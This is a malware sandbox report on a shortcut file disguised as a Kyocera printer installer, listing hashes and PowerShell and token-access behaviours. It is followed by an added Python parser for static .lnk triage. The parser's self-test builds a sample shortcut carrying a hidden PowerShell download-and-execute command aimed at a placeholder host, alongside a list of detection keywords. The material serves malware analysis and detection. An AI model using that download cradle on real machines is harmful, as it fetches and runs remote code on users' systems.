Managed XDR

c-users-user-appdata-l...esora-kyocera-2023.lnk: dynamic analysis report for a malicious file

File information

File name
c-users-user-appdata-local-temp-40vdhut3.d43-addprinters_2023-portugal-instalacion-impresora-kyocera-2023.lnk
File type
MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Wed May 18 13:23:29 2016, mtime=Wed May 18 13:23:29 2016, atime=Wed Oct 29 02:16:41 2014, length=478720, window=hide
File size
1.1 KB
First seen
Last seen

Environment

win7/x86 en

Hashes

SHA1
f921fd06fcabdd3f99109f10c704e72fe08f7259
SHA256
9510341262b415a3a792ab5f875beaa1f4f43c5de78a077775a29b35b66d87a3
MD5
a0741c15bec8f65a0937a8ce44fb991a

Signatures

Execution

T1059.001 suspicious_powershell: Creates suspicious powershell process
T1059.001 suspicious_process: Spawns a suspicious process

Privilege Escalation

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Defense Evasion

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Other

yara_rules: Static rules
unexpected_exception: Unexpected exception
creates_suspended_process: Creates suspended process
get_policy_info: Retrieves information about a Policy object
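The file-type line above reports a shortcut with an item ID list, a LinkInfo target, a working directory and command-line arguments, and the Execution signatures show it spawning PowerShell. Before detonating such a sample, a practitioner usually parses the .lnk statically to read the exact command it launches. The following is an added example, not code from the report or the Managed XDR service: a minimal MS-SHLLINK parser that walks the ShellLinkHeader, skips the LinkTargetIDList, reads LocalBasePath from LinkInfo, decodes the StringData entries, and applies a few PowerShell-oriented heuristics. The sample shortcut it parses is constructed inline (the target path, arguments, placeholder URL `example.invalid` and the heuristic labels are all assumptions, not data from the analysed file).

```python
"""Static triage of a Windows Shell Link (.lnk): parse the header, LinkInfo and
StringData sections to recover target, working directory and arguments without
running the shortcut (layout per MS-SHLLINK). Added example, not vendor code."""
import struct
from dataclasses import dataclass

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
LINK_FLAGS = {0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
              0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
              0x40: "HasIconLocation", 0x80: "IsUnicode"}
SW_HIDE, SW_SHOWNORMAL = 0, 1


@dataclass
class LnkInfo:
    flags: list
    show_command: int
    local_base_path: str = ""   # from LinkInfo, when HasLinkInfo is set
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def _read_string(data, off, unicode):
    """StringData entry: uint16 CountCharacters, then the characters with no NUL."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", errors="replace"), off + count


def _read_link_info(data, off):
    """LinkInfo: LinkInfoSize, header size, flags, then offsets; LocalBasePath is
    a NUL-terminated ANSI string at LocalBasePathOffset (field at +16)."""
    size, _hdr_size, li_flags = struct.unpack_from("<III", data, off)
    local_base = ""
    if li_flags & 0x01:  # VolumeIDAndLocalBasePath
        (lbp_off,) = struct.unpack_from("<I", data, off + 16)
        start = off + lbp_off
        local_base = data[start:data.index(b"\x00", start)].decode("cp1252", errors="replace")
    return local_base, off + size


def parse_lnk(data: bytes) -> LnkInfo:
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)       # LinkFlags
    (show_cmd,) = struct.unpack_from("<I", data, 60)    # ShowCommand
    info = LnkInfo([n for b, n in LINK_FLAGS.items() if flags & b], show_cmd)
    off = 76
    if flags & 0x01:  # LinkTargetIDList: uint16 IDListSize, then the IDList incl. TerminalID
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & 0x02:
        info.local_base_path, off = _read_link_info(data, off)
    unicode = bool(flags & 0x80)
    for bit, attr in ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                      (0x20, "arguments"), (0x40, "icon_location")):
        if flags & bit:  # StringData entries appear in exactly this order
            value, off = _read_string(data, off, unicode)
            setattr(info, attr, value)
    return info


def triage(info: LnkInfo) -> list:
    """Assumed heuristics for a shortcut that launches PowerShell; tune to taste."""
    hits = []
    cmd = (info.local_base_path + " " + info.arguments).lower()
    if "powershell" in cmd or "pwsh" in cmd:
        hits.append("launches PowerShell")
    for needle, label in (("-w hidden", "hidden window"), ("-windowstyle hidden", "hidden window"),
                          ("-enc", "encoded command"), ("-ep bypass", "execution policy bypass"),
                          ("iex", "Invoke-Expression"), ("downloadstring", "remote payload download")):
        if needle in cmd and label not in hits:
            hits.append(label)
    if info.show_command != SW_SHOWNORMAL:  # e.g. SW_HIDE, shown by `file` as window=hide
        hits.append(f"ShowCommand={info.show_command} (not SW_SHOWNORMAL)")
    return hits


def build_sample_lnk() -> bytes:
    """Constructed artefact for this example; not the file from the report."""
    flags = 0x01 | 0x02 | 0x10 | 0x20 | 0x80   # IDList, LinkInfo, WorkingDir, Arguments, Unicode
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20) + b"\x00" * 24  # 3 FILETIMEs
    header += struct.pack("<IiI", 0, 0, SW_HIDE) + struct.pack("<HHII", 0, 0, 0, 0)
    item = struct.pack("<H", 10) + b"\x1f\x50\xe0\x4f\xd0\x20\xea\x3a"   # one opaque ItemID
    idlist = item + b"\x00\x00"                                           # TerminalID
    target = b"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\x00"
    volume = struct.pack("<IIII", 0x11, 3, 0x1234ABCD, 0x10) + b"\x00"    # VolumeID, empty label
    lbp_off = 0x1C + len(volume)
    suffix_off = lbp_off + len(target)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x01, 0x1C, lbp_off, 0, suffix_off)
    link_info += volume + target + b"\x00"                                # empty CommonPathSuffix
    strings = b""
    for s in ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "-w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/p.ps1')\""):       # placeholder URL
        strings += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + struct.pack("<H", len(idlist)) + idlist + link_info + strings


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    print(parsed)
    print(triage(parsed))
```

Run it against a real sample with `parse_lnk(open(path, "rb").read())`; ExtraData blocks after the StringData (for example the tracker or environment-variable blocks) are ignored here, and the IDList is skipped rather than resolved, so a shortcut whose only target reference lives in the IDList will show an empty `local_base_path`.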